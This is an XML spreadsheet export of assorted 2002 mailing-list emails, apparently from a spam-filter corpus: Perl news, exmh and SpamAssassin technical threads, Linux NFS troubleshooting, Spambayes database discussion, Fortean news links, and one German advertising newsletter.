    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 27 Aug 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 02:00:30 +0000</t>
  </si>
  <si>
    <t>[use Perl] Stories for 2002-08-27</t>
  </si>
  <si>
    <t>use Perl Daily Newsletter\n\nIn this issue:\n    * This Week on perl5-porters (19-25 August 2002)\n    * Slashdot Taking Questions to Ask Larry Wall\n\n+--------------------------------------------------------------------+\n| This Week on perl5-porters (19-25 August 2002)                     |\n|   posted by rafael on Monday August 26, @07:42 (summaries)         |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nI guess those thunderstorms came. And how they came. From an even wetter\nthan normal country on the shores of the North Sea, comes this weeks\nperl5-porters summary.\n\nThis story continues at:\n    [URL]http://use.perl.org[/URL]\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\n\n+--------------------------------------------------------------------+\n| Slashdot Taking Questions to Ask Larry Wall                        |\n|   posted by pudge on Monday August 26, @14:41 (perl6)              |\n|   [URL]http://use.perl.org[/URL]              |\n+--------------------------------------------------------------------+\n\nPlease, if you feel inclined, make sure some [0]reasonable questions are\nasked of him.\n\nDiscuss this story at:\n    [URL]http://use.perl.org[/URL]\n\nLinks:\n    0. [URL]http://interviews.slashdot.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 http://use.perl.org http://use.perl.org http://interviews.slashdot.org http://use.perl.org</t>
  </si>
  <si>
    <t>To: yyyy-use-perl@spamassassin.taint.org\nFrom: pudge@perl.org\nDate: Tue, 27 Aug 2002 02:00:24 +0000</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 02:00:24 +0000</t>
  </si>
  <si>
    <t>[use Perl] Headlines for 2002-08-27</t>
  </si>
  <si>
    <t>use Perl Daily Headline Mailer\n\nThis Week on perl5-porters (19-25 August 2002)\n    posted by rafael on Monday August 26, @07:42 (summaries)\n    [URL]http://use.perl.org[/URL]\n\nSlashdot Taking Questions to Ask Larry Wall\n    posted by pudge on Monday August 26, @14:41 (perl6)\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FoRK &lt;FoRK@xent.com&gt;\nFrom: Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt;\nDate: Tue, 27 Aug 2002 01:24:00 -0400</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 01:24:00 -0400</t>
  </si>
  <si>
    <t>Gecko adhesion finally sussed.</t>
  </si>
  <si>
    <t>(Via Robot Wisdom)   Maybe you UC folk know these people?\n\n[URL]http://www.eurekalert.org[/URL]\n\nWorking at Lewis &amp; Clark College, the University of California at Berkeley, \nthe University of California at Santa Barbara, and Stanford University, \nthe interdisciplinary team:\n\n    * confirmed speculation that the gecko's amazing climbing ability \ndepends on weak molecular attractive forces called van der Waals forces,\n\n    * rejected a competing model based on the adhesion chemistry of water \nmolecules, and\n\n* discovered that the gecko's adhesive depends on geometry, not surface \nchemistry. In other words, the size and shape of the tips of gecko foot \nhairs--not what they are made of--determine the gecko's stickiness.\n\nTo verify its experimental and theoretical results, the gecko group then \nused its new data to fabricate prototype synthetic foot-hair tips from two \ndifferent materials.\n\n"Both artificial setal tips stuck as predicted," notes Autumn, assistant \nprofessor of biology at Lewis &amp; Clark College in Portland, Ore. "Our \ninitial prototypes open the door to manufacturing the first biologically \ninspired dry, adhesive microstructures, which can have widespread \napplications."</t>
  </si>
  <si>
    <t>To: Valdis.Kletnieks@vt.edu\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Tue, 27 Aug 2002 00:38:05 +0200</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 00:38:05 +0200</t>
  </si>
  <si>
    <t>Valdis.Kletnieks@vt.edu said:\n&gt; I checked on a number of small messages in a big folder (~10000 \n&gt; msgs). The delay of the Next button has increased considerably:\n&gt; \n&gt; 2.5-release: 350-450 msec\n&gt; latest cvs: 1000-12000 msec\n&gt; I'm not seeing a hit on 'next'. A quick "just pound on 'next' and\n&gt; watch the wall clock" test shows me able to go through 20 messages in\n&gt; under 5 seconds, so it's well under 250ms per switch, but I'm seeing a\n&gt; really piggy CPU spike (100% for a few seconds) in the 'flist' code.\n&gt; Of course, it seems to be related to number-of-folders:\n\n&gt; [~] wc Mail/.folders\n&gt;     131     131    1122 Mail/.folders \n\nI have 167 folders (!) and run with bg-proc set to flist (1 minute). \nI see delays, but not that much. Maybe 1-3 seconds (which tend to \ndisappear these days). This is on a PII-266.\n\nBR,\n/A\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: exmh-workers@spamassassin.taint.org\nFrom: Anders Eriksson &lt;aeriksson@fastmail.fm&gt;\nDate: Tue, 27 Aug 2002 00:34:43 +0200</t>
  </si>
  <si>
    <t>Tue, 27 Aug 2002 00:34:43 +0200</t>
  </si>
  <si>
    <t>cwg-dated-1030817858.a49b7e@DeepEddy.Com said: &gt; From:  Anders Eriksson  &gt; Date:  Mon, 26 Aug 2002 20:00:36 +0200 &gt; &gt;  &gt; lately I've got the feeling that exmh is getting slower and slower. I  &gt; just decided to check that vs. reality, and yes, speed has left the  &gt; scene somewhere between the release of 2.5 and now. &gt;  &gt; I checked on a number of small messages in a big folder (~10000  &gt; msgs). The delay of the Next button has increased considerably: &gt;  &gt; 2.5-release: 350-450 msec &gt; latest cvs: 1000-12000 msec &gt;  &gt; Frankly I think this is getting close to non-acceptable since the  &gt; user settings hasn't changed. &gt;  &gt; Anybody have any ideas where performance disappeared? &gt; Most likely in the added overhead of managing more sequences. &gt; I'm sure it can be tuned a bunch, but as I'm leaving for a vacation on &gt; Friday,  and have plenty of "real work" to do, I won't be able to do &gt; much until I get  back. &gt; I *will* look at all this when I get back, but if you want to check &gt; into  what's slow and fix things while I'm gone, my feelings won't be &gt; hurt. &gt; Chris  Just one more info. I measured the time spent wrapping the stuff in  Ftoc_Next with time {} so the data is for real. One difference  between mine and Valdis' setup (judging from his trace) is that I use  the address book. I've been doing that for ages so that can't be the  problem. Is there a way to get the log to print time with higher granularity? /A _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: zzzzteana@yahoogroups.com\nFrom: "timothy_hodkinson" &lt;mephistopheles29@hotmail.com&gt;\nDate: Tue, 26 Nov 2002 16:14:14 -0000</t>
  </si>
  <si>
    <t>Tue, 26 Nov 2002 16:14:14 -0000</t>
  </si>
  <si>
    <t>[zzzzteana] Re: More Japanese stuff</t>
  </si>
  <si>
    <t>&gt; &gt;-- be careful when using this one.) Also, that really cute thing \nthat\n&gt; &gt;Japanese AV girls do of leaving their panties on one leg while \nmaking love\n\nDare I ask what a Japanese "AV girl" is? \ntimh\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Andy C" &lt;andy@r2-dvd.org&gt;\nDate: Tue, 26 Nov 2002 16:12:52 -0000</t>
  </si>
  <si>
    <t>Tue, 26 Nov 2002 16:12:52 -0000</t>
  </si>
  <si>
    <t>"Andy C" &lt;andy@r2-dvd.org&gt;</t>
  </si>
  <si>
    <t>[zzzzteana] Animal attraction for sale</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\nA bizarre collection of stuffed animals could fetch up to 2m when it is\nsold by a Cornwall museum.\nThe Museum of Curiosities is home to a menagerie of 10,000 Victorian stuffed\nanimals.\nThe museum, next to the Jamaica Inn on Bodmin Moor, gets about 30,000\nvisitors a year.\nBut now the inn's owner Kevin Moore has decided to sell.\n\nStuffed frogs are for sale\n\nMr Moore said: "It was very fashionable to have taxidermy on your\nmantlepiece in Victorian times, but it is not really in favour now."\nNevertheless, figures of up to 2m for the collection have been discussed.\nThe museum was opened in 1861 by taxidermist Walter Potter.\nTableaux include a kittens tea party, cricket-playing guinea pigs and\nswinging frogs.\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\nShare the magic of Harry Potter with Yahoo! Messenger\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: Niall O Broin &lt;niall@linux.ie&gt;\nDate: Tue, 26 Nov 2002 16:12:12 +0000</t>
  </si>
  <si>
    <t>Tue, 26 Nov 2002 16:12:12 +0000</t>
  </si>
  <si>
    <t>Niall O Broin &lt;niall@linux.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] NFS slowness with SuSE 8.1</t>
  </si>
  <si>
    <t>NFS as a protocol is not known for its speediness but this is absurd. I did an \nNFS install of a box this morning (that would be the box which won't boot \nfrom CD for those who were in IRC) and it was rather slow but I just left it \nto it. Having got it up, I want to copy the DVD to a disk on it so I have it \nhandy for installing any further bits I might require. So I simply mounted \nthe NFS exported DVD on the new box and started copying. \n\nAfter a couple of minutes I looked - it was transferring about 8MB a MINUTE. \nSo I killed that and used rsync instead which is ticking away now at about \n100 MB/min - still not exactly turbo charged but a lot better than the NFS \nrate. Any ideas as to what's making it SO slow ? There's really no point in \nrunning more nfsd processes, as there is exactly one client, so I'm a little \nat a loss I must say.\n\n\n\nNiall\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;zzzzteana@yahoogroups.com&gt;\nFrom: "Andy C" &lt;andy@r2-dvd.org&gt;\nDate: Tue, 26 Nov 2002 16:11:34 -0000</t>
  </si>
  <si>
    <t>Tue, 26 Nov 2002 16:11:34 -0000</t>
  </si>
  <si>
    <t>[zzzzteana] Search for missing lynx</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n \n\n\n\n------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;\n4 DVDs Free +s&amp;p Join Now\n[URL]http://us.click.yahoo.com[/URL]\n---------------------------------------------------------------------~-&gt;\n\nTo unsubscribe from this group, send an email to:\nforteana-unsubscribe@egroups.com\n\n \n\nYour use of Yahoo! Groups is subject to [URL]http://docs.yahoo.com[/URL]</t>
  </si>
  <si>
    <t>To: skip@pobox.com\nFrom: jeremy@alum.mit.edu (Jeremy Hylton)\nDate: Tue, 26 Nov 2002 11:14:49 -0500</t>
  </si>
  <si>
    <t>Tue, 26 Nov 2002 11:14:49 -0500</t>
  </si>
  <si>
    <t>jeremy@alum.mit.edu (Jeremy Hylton)</t>
  </si>
  <si>
    <t>skip@pobox.com</t>
  </si>
  <si>
    <t>Re: [Spambayes] Guidance re pickles versus DB for Outlook</t>
  </si>
  <si>
    <t>&gt;&gt;&gt;&gt;&gt; "SM" == Skip Montanaro  writes:   Jeremy&gt; Put another way, I'd be interested to hear why you don't   Jeremy&gt; want to use ZODB.   SM&gt; Disclaimer: I'm not saying I don't want to use ZODB.  I'm   SM&gt; offering some reasons why it might not be everyone's obvious   SM&gt; choice. But you're not saying you do want to use ZODB, so you're still part of the problem .   SM&gt; For most of us who have *any* experience with ZODB it's probably   SM&gt; all indirect via Zope, so there are probably some inaccurate   SM&gt; perceptions about it.  These thoughts that have come to my mind   SM&gt; at one time or another:   SM&gt; * How could a database from a company (Zope) whose sole business   SM&gt;       is not databases be more reliable than a database from   SM&gt;       organizations whose sole raison d'etre is databases   SM&gt;       (Sleepycat, Postgres, MySQL, ...)? I don't think I could argue that ZODB is more reliable that BerkeleyDB.  It's true that we have fewer database experts and expend fewer resources working on database reliability.  On the other hand, Barry is nearly finished with a BerkeleyDB-based storage for ZODB. ZODB is an object persistence tool that uses a database behind it. You can use our FileStorage or you can use someone else's database, although BerkeleyDB is the best we can offer at the moment.  (It would be really cool to do a Postgres storage...)   SM&gt; * Dealing with Zope's monolithic system is frustrating to people   SM&gt;       (like me) who are used to having files reside in   SM&gt;       filesystems.  Some of that frustration probably carries   SM&gt;       over to ZODB, though it's almost certainly not ZODB's   SM&gt;       problem. This sounds like a Zope complaint that doesn't have anything to do with ZODB, but maybe I misunderstand you.  You don't have to store your code in the database, although that will be mostly possible in ZODB4. Seriously, ZODB stores object pickles in a database.  The storage layer is free to manage those pickles however it likes.  FileStorage uses a single file.  Toby Dickenson's DirectoryStorage represents each pickle as a separate file.   SM&gt; * It seems to grow without bound, else why do I need to pack my   SM&gt;       Data.fs file every now and then? It grows without bound unless you pack it.  Why is that a problem?  BerkeleyDB log files grow without bound, too.  Databases require some tending.  One possibility with FileStorage is to add an explicit pack() call to update training operation.  We'd need to think carefully about the performance impact.   SM&gt; Also, there is the issue of availability.  While it's just an   SM&gt; extra install, its use requires more than the usual Python   SM&gt; install.  Having it in the core distribution would provide   SM&gt; stronger assurances that it runs wherever Python runs (e.g.,   SM&gt; does it run on MacOS 8 or 9, both of which I believe Jack still   SM&gt; supports with his Mac installer?). I think we'd want a spambayes installer that packaged up spambayes, python, and zodb. Jeremy _______________________________________________ Spambayes mailing list Spambayes@python.org [URL]http://mail.python.org[/URL]</t>
  </si>
  <si>
    <t>http://mail.python.org</t>
  </si>
  <si>
    <t>RUS</t>
  </si>
  <si>
    <t>To: Zzzzz@gmx.de\nFrom: Fax2Mail &lt;R-1-270241-5399979-2-24365-DE1-3A9F193C@xmr3.com&gt;\nDate: Tue, 25 Jun 2002 06:01:25 -0400</t>
  </si>
  <si>
    <t>Tue, 25 Jun 2002 06:01:25 -0400</t>
  </si>
  <si>
    <t>Fax2Mail &lt;R-1-270241-5399979-2-24365-DE1-3A9F193C@xmr3.com&gt;</t>
  </si>
  <si>
    <t>Zzzzz@gmx.de</t>
  </si>
  <si>
    <t>F2M - Ihre kostenlose Faxnummer - Newsletter</t>
  </si>
  <si>
    <t>Bitte beachten Sie die Angebote unserer Werbepart= ner.   =20 Diese erm=F6glichen den kostenfreien Betrieb des Fax2Mail-Service.   =20 Vielen Dank.   =20  = =20  =20  | ![](3D"[URL]https://pull.xmr3.c[/URL]   ---   =20  =20 **Der neue Cyberport-Katalog ist da! =20 =20 Reinschauen ist jetzt auch offline m=F6glich, mit de= m druckfrischen Cyberport-Katalog.   St=F6bern Sie in unserem Angebot, wann und wo Sie wollen. Entdecken Sie = auf 322 Seiten   sechs interessante Einkaufswelten, randvoll mit topaktuellen Highlights = rund um den   Computer, Telekommunikation und Multimedia - nat=FCrlich zu absoluten Ha= mmerpreisen. =20 Bitte registrieren Sie sich hier ![](3D"[URL]https://pull.xmr3.com[/URL]&lt;= /A&gt; =20 Und hier unsere Shops im =DCberblick:      =  =20  ![](3D"[URL]https://pull.xmr3.com[/URL] |  = **Mac-Shop =96 Cyberdesign f=FCr jeden Tag      Ein Paradies f=FCr Apple-Fans! Ob iMac, iBook   oder PowerMac: Hier finden Sie die   aktuellsten Modelle =96 und dazu jede Menge   Software und Peripherie =96 vom Cinema   Display =FCber Foto-Drucker bis zum neuen   iPod!      ---|---   =20  ![](3D"[URL]https://pull.xmr3.com[/URL] | **P** **C-Shop =96 Power satt f= =FCr mehr Souver=E4nit=E4t**      Nat=FCrlich kommen Sie bei uns auch als PC-   User voll auf Ihre Kosten: Wir bieten Ihnen   leistungsstarke PC-Komplettsysteme f=FCr   Home- und Business-Anwendungen, Super-   Zusatzkomponenten f=FCr Gamer und   Multimedia-Freaks sowie Top-Endger=E4te und   Zubeh=F6r vom Foto-Scanner bis zum TFT-Display!      =20  ![](3D"[URL]https://pull.xmr3.com[/URL] |   **Mobile-Shop =96 neueste Technik f=FCr   grenzenlose Mobilit=E4t ** =20 Willkommen in der mobilen Zukunft! Ob   Notebook oder PDA, Handy oder   Navigationssystem: Bei uns finden Freunde   des mobilen Lebens f=FCr jeden Zweck das   optimale Angebot =96 f=FCr mehr Freiheit unterwegs!      = =20  ![](3D"[URL]https://pull.xmr3.com[/URL] |   **Network-Shop =96 Effizienz von Profis f=FCr =   Profis** =20 Die ganze Welt von LAN, Switches, Router &amp;   Co. Hier gibt=92s ma=DFgeschneiderte Netzwerk-   L=F6sungen f=FCr den privaten wie professionellen   Bedarf =96 von der einfachen Netzwerkkarte bis   zum Wireless LAN mit Internetzugang,   Printserver und integrierter Firewall f=FCr   maximale Sicherheit!      =20  ![](3D"[URL]https://pull.xmr3.com[/URL]   **V** **ideo/Audio-Shop =96 alle F= reiheit f=FCr Ihre   W=FCnsche** =20 Ob Digital-Foto und -Video, MP3, DVD oder   Breitband-TV: Wir pr=E4sentieren Ihnen die   absoluten High-Tech-Hits von SONY, Denon,   JVC, Panasonic, Toshiba und vielen anderen   Top-Marken. Selbstverst=E4ndlich zu   atemberaubend g=FCnstigen Preisen!      =20  ![](3D"[URL]https://pull.xmr3.com[/URL] |   **Software-Shop =96 f=FCr mehr Vielfalt und mehr Innovation ** =20 Ob Betriebssystem oder Office-Suite, DTP   oder Multimedia, Video-Bearbeitung oder   aktuelle Games: Wir bieten Ihnen die perfekte   L=F6sung f=FCr jede denkbare PC-Anwendung.   Nat=FCrlich inklusive Update- und   Schulversionen sowie top-aktuellen   Handb=FCchern f=FCr Einsteiger und Profis!         =20   Welche DVD-Formate gibt es? Wie funktioniert eine Wi= reless LAN-Verbindung? Diese und   viele weitere Fragen werden gekl=E4rt. Wenn Sie noch keinen Katalog besi= tzen, dann bestellen   Sie schnell und nehmen Sie sich etwas Zeit f=FCr die neuesten Produkte d= er Technik. =20 F=FCr Ihre Kataloganforderung erhalten Sie von uns einmalig   einen Warengutschein in H=F6he von 5 EUR. =20    Bitte registrieren Sie sich hier:![](3D"[URL]https://pull.xmr3.com[/URL]      ---   =20 =20 M=F6chten Sie diese Mail weiterleiten dann klicken Sie hier=      =20 =20 Wenn Sie den Newsletter nicht mehr erhalten wollen, m=FCsse= n Sie sich   komplett vom Fax2Mail Service abmelden. Gehen Sie hierzu auf   [URL]http://f2m.xpedite.de[/URL] Im Bereich 'Setup' k=F6nnen Sie sich =FCber   den Knopf 'Daten l=F6schen' abmelden.   Mit freundlichen Gr=FC=DFen   Ihr F2M Team   Dies ist ein Service der XPEDITE Systems GmbH verschickt =FCber das   messageREACH-System.   Weitere Informationen finden Sie unter [URL]http://f2m.xpedite.de[/URL]   =20</t>
  </si>
  <si>
    <t>https://pull.xmr3.c https://pull.xmr3.com https://pull.xmr3.com https://pull.xmr3.com https://pull.xmr3.com https://pull.xmr3.com https://pull.xmr3.com https://pull.xmr3.com https://pull.xmr3.com http://f2m.xpedite.de http://f2m.xpedite.de</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Geege Schuman" &lt;geege@barrera.org&gt;\nDate: Tue, 24 Sep 2002 21:36:35 -0400</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 21:36:35 -0400</t>
  </si>
  <si>
    <t>Liberalism in America</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format.\n\n------=_NextPart_000_0005_01C26412.7545C1D0\nContent-Type: text/plain;\n	charset="iso-8859-1"\nContent-Transfer-Encoding: 7bit\n\nliberalism\npropagandized as meddling\nin truth, the middle\n\n"American liberalism believes that in this respect it has made a major\ncontribution to the grand strategy of freedom. Where both capitalists and\nsocialists in the 1930's were trying to narrow the choice to either/or --\neither laissez-faire capitalism or bureaucratic socialism -- the New Deal\npersisted in its vigorous faith that human intelligence and social\nexperiment could work out a stable foundation for freedom in a context of\nsecurity and for security in a context of freedom. That faith remains the\nbest hope of free society today."\n\nfluid yet crunchy,\ngg\n\n\n\n\n [URL]http://www.english.upenn.edu[/URL]\n\n------=_NextPart_000_0005_01C26412.7545C1D0\nContent-Type: application/octet-stream;\n	name="Liberalism in America.url"\nContent-Transfer-Encoding: 7bit\nContent-Disposition: attachment;\n	filename="Liberalism in America.url"\n\n[DEFAULT]\nBASEURL=[URL]http://www.english.upenn.edu[/URL]\n[InternetShortcut]\nURL=[URL]http://www.english.upenn.edu[/URL]\nModified=E0824ED43364C201DE\n\n------=_NextPart_000_0005_01C26412.7545C1D0--</t>
  </si>
  <si>
    <t>http://www.english.upenn.edu http://www.english.upenn.edu http://www.english.upenn.edu</t>
  </si>
  <si>
    <t>To: forkit! &lt;fork@spamassassin.taint.org&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Tue, 24 Sep 2002 18:01:44 +0200 (CEST)</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 18:01:44 +0200 (CEST)</t>
  </si>
  <si>
    <t>forkit! &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>Re: [s-t] Scoot boss's wife orders hit.</t>
  </si>
  <si>
    <t>---------- Forwarded message ----------\nDate: Mon, 23 Sep 2002 09:52:44 -0700\nFrom: mis@seiden.com\nSubject: Re: [s-t] Scoot boss's wife orders hit.\n\n\nthe "independent", a shopper's newspaper in the sf bay area, (the\noperational definition of that media category is "no matter how hard\nyou try you can't get them to stop delivering it") had this story on\naug 24, 2002:\n\n"Dot-com downturn linked to domestic violence"\n\nDomestic-violence worker Kathy Black remembers watching the Nasdaq \ntake a nastydive on MSNBC, in March 2000.\n\n"I knew then that we would have a lot of work on our hands," Black said,\nreferring to the caseload at La Casa de las Madres, the city's largest\norganization serving women and children affected by domestic violence.\n\nShe was right.\n\nCalls to La Casa's crisis line increased by 33% in the last financial\nyear, and the service saw a 10 percent increase in the demand for\nbeds, with 232 women and 215 children utilizing the shelter service.\n...\n\nBlack said the dot-com collapse and a growing awareness of La Casa's\nservices were the two main reasons for the increase in calls.\n\nShe said many of her clients had partners who were employed in\nservice-industry jobs utilized by dot-com workers   \n...\n\n\n\nOn Mon, Sep 23, 2002 at 04:23:17PM +0100, Gordon Joly wrote:\n&gt; \n&gt; \n&gt; \n&gt; [URL]http://news.bbc.co.uk[/URL]\n&gt; \n&gt; \n&gt; Woman admits trying to hire hitman\n&gt; \n&gt; The former wife of an internet tycoon has admitted trying to hire a \n&gt; hitman to kill him after the breakdown of their 21-year marriage.\n&gt; \n&gt; \n&gt; -- \n&gt; Linux User No. 256022///\n&gt; [URL]http://pobox.com[/URL]\n&gt; gordon.joly@pobox.com///</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://pobox.com</t>
  </si>
  <si>
    <t>To: "Cheryl L. Southard" &lt;cld@astro.caltech.edu&gt;,\nFrom: "Steve Thomas" &lt;sthomas@apexvoice.com&gt;\nDate: Tue, 24 Sep 2002 15:25:54 -0700</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 15:25:54 -0700</t>
  </si>
  <si>
    <t>"Cheryl L. Southard" &lt;cld@astro.caltech.edu&gt;,</t>
  </si>
  <si>
    <t>RE: [SAtalk] user_prefs ignored</t>
  </si>
  <si>
    <t>This is just an semi-educated guess - if I'm wrong, someone please correct\nme!\n\nSpamd setuid's to the user running spamc. Since you're calling spamc from a\nglobal procmailrc file, it's being run as root (most likely). If called as\nroot, spamd won't open user_prefs files.\n\n&gt;&gt;From the spamc man page:\n\n       -u username\n           This argument has been semi-obsoleted.  To have spamd use\n           per-user-config files, run spamc as the user whose config\n           files spamd should load.  If you're running spamc as some\n           other user though (eg. root, mail, nobody, cyrus, etc.)\n           then you can still use this flag.\n\n\nThe solution is to set DROPPRIVS=yes in /etc/procmailrc, just before running\nspamc. From the procmailrc man page:\n\n       DROPPRIVS   If set to `yes' procmail will drop all privileges\n                   it might have had (suid or sgid).  This  is  only\n                   useful  if  you  want  to guarantee that the bottom\n                   half of the /etc/procmailrc file is executed on\n                   behalf of the recipient.\n\n\nI hope that helps, and I also hope it's right!\n\nSt-\n\n\n| -----Original Message-----\n| From: spamassassin-talk-admin@example.sourceforge.net\n| [mailto:spamassassin-talk-admin@lists.sourceforge.net]On Behalf Of\n| Cheryl L. Southard\n| Sent: Tuesday, September 24, 2002 2:28 PM\n| To: spamassassin-talk@example.sourceforge.net\n| Subject: [SAtalk] user_prefs ignored\n|\n|\n| Hi All,\n|\n| I am running SpamAssassin 2.41 with procmail as my local delivery agent\n| with sendmail.  I use spamc/spamd so that it runs site-wide from\n| /etc/procmailrc.\n|\n| spamd is run as root with the flags "-d -a -c", and spamc isn't run with\n| any flags.\n|\n| When I was testing the program, I deployed spamc from my personal\n| ~/.procmailrc file, my ~/.spamassassin/user_prefs file was read each time.\n| I can see this because I have a non-default "required_hits" value which\n| gets reported in every e-mail on the "X-Spam-Status" line.\n|\n| Now that I run spamc from the global /etc/procmailrc file, my\n| ~/.spamassassin/user_prefs file is no longer being read or processed from\n| e-mails from outside computers.  The "required_hits" value gets set back\n| to the one in /etc/mail/spamassassin/local.cf.  However, if I send local\n| e-mail, my user_prefs file is read and processed correctly.\n|\n| Does anyone know how to fix this problem?  if this is a spamassassin or\n| procmail bug?\n|\n| Thanks,\n|\n| Cheryl\n|\n| --\n| Cheryl Southard\n| cld@astro.caltech.edu\n|\n|\n| -------------------------------------------------------\n| This sf.net email is sponsored by:ThinkGeek\n| Welcome to geek heaven.\n| [URL]http://thinkgeek.com[/URL]\n| _______________________________________________\n| Spamassassin-talk mailing list\n| Spamassassin-talk@lists.sourceforge.net\n| [URL]https://lists.sourceforge.net[/URL]\n|\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Ted Cabeen &lt;secabeen@pobox.com&gt;\nFrom: "John R. LoVerso" &lt;john@loverso.southborough.ma.us&gt;\nDate: Tue, 24 Sep 2002 14:08:21 -0400</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 14:08:21 -0400</t>
  </si>
  <si>
    <t>"John R. LoVerso" &lt;john@loverso.southborough.ma.us&gt;</t>
  </si>
  <si>
    <t>Ted Cabeen &lt;secabeen@pobox.com&gt;</t>
  </si>
  <si>
    <t>Re: Minor feature request</t>
  </si>
  <si>
    <t>&gt; How easy would it be to code a menu item that marks as read all messages \n&gt; before the current message?  I often have problems reading heavy-traffic \n&gt; mailing lists in exmh because I want to read only a subset of a lists \n&gt; messages, but I lose track of where I was in the particular folder.  \n&gt; \n&gt; This could also be coded more generally in the new sequences code as a way to \n&gt; remove all messages before current from a particular sequence.\n\nEasy.\n\nFirst, you'll have to excuse me as I'm still using 2.3.1 (*), so, this\nmay not play well with recent changes.  (I did look at 2.5.1, too).\nAnd, I just did this off the top of my head (I wanted to see if it\n(**) still worked), so this is somewhat untested.\n\nAdding a menu entry is trivial; add this to your ~/.exmh/exmh-defaults:\n\n*Fops.more.m.uentrylist:	ketchup\n*Fops.more.m.l_ketchup:		Catch-up all b4 cur\n*Fops.more.m.c_ketchup:	 	My_Mark2CurSeen\n\nThen you just need to provide the source for My_Mark2CurSeen and \narrange for Exmh to include it (put it in your ~/.tk/exmh directory\nin your user.tcl; or in pick.patch if you enable the "source hook"\nunder Prefs-&gt;Hacking Support)\n\nIt's going to look something like this:\n\nproc My_Mark2CurSeen {} {\n    global exmh pick msg\n    Exmh_Status "Clearing unseen up to cur..." red\n    Mh_SetCur $exmh(folder) $msg(id)\n    set pick(ids) [...get message ids for "pick 1-cur"...]\n    busy PickMarkSeen\n    Exmh_Status ok blue\n}\n\n(that's based upon the guts of Pick_MarkSeen)\n\nYou need to fill in the code for the [...get...] section; I ran out of\ntime!\n\nJohn\n\n(*) "It just works" (tm)\n(**) "it" == my head\n\n\n\n_______________________________________________\nExmh-workers mailing list\nExmh-workers@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: Scott Lipcon &lt;slipcon@mercea.net&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Tue, 24 Sep 2002 12:29:35 -0500</t>
  </si>
  <si>
    <t>Tue, 24 Sep 2002 12:29:35 -0500</t>
  </si>
  <si>
    <t>Scott Lipcon &lt;slipcon@mercea.net&gt;</t>
  </si>
  <si>
    <t>Re: traceback in new exmh</t>
  </si>
  <si>
    <t>--==_Exmh_-1249285507P Content-Type: text/plain; charset=us-ascii &gt; From:  Scott Lipcon  &gt; Date:  Mon, 23 Sep 2002 22:35:05 -0400 &gt; &gt; The speed is a problem for sure - It takes a long time to do the &gt; rescanning of sequences (I associate it with hitting the 'flist' &gt; button, or when my background flist goes off).    I'm running on a &gt; pretty fast system (Athlon 1700+, 512Mb RAM, 10k RPM ultra SCSI disk) &gt; and hitting flist used to take no more than a second.  The big &gt; difference might just be perception, because the the old code just &gt; updated all the folders (count + color) all at once, instead of making &gt; it look like there is 0 unseen, then counting its way back up.   &gt;  &gt; I doubt I'll have much time in the immediate future to hack at this, &gt; but if I do - can you suggest areas that might be the best to &gt; optimize?   If not, do you think we can put in some preferences to &gt; disable some of the more intensive features?   I'd rather disable all &gt; the sequence support (except unseen, of course) and have reasonable &gt; speed.   I suspect people on slow machines would find the current &gt; state unusable. If I knew where the problem was, I'd fix it myself. Finding it is probably more work than the actual fix. &gt; &gt;  &gt; &gt; This is because of your Hook_MsgShow_update_unseen which is calling a fun &gt; ctio &gt; &gt; n  &gt; &gt; which no longer exists. &gt; &gt;  &gt; &gt; I suspect you need &gt; &gt; 	Seq_Del $exmh(folder) unseen $msgid &gt; &gt; now instead of 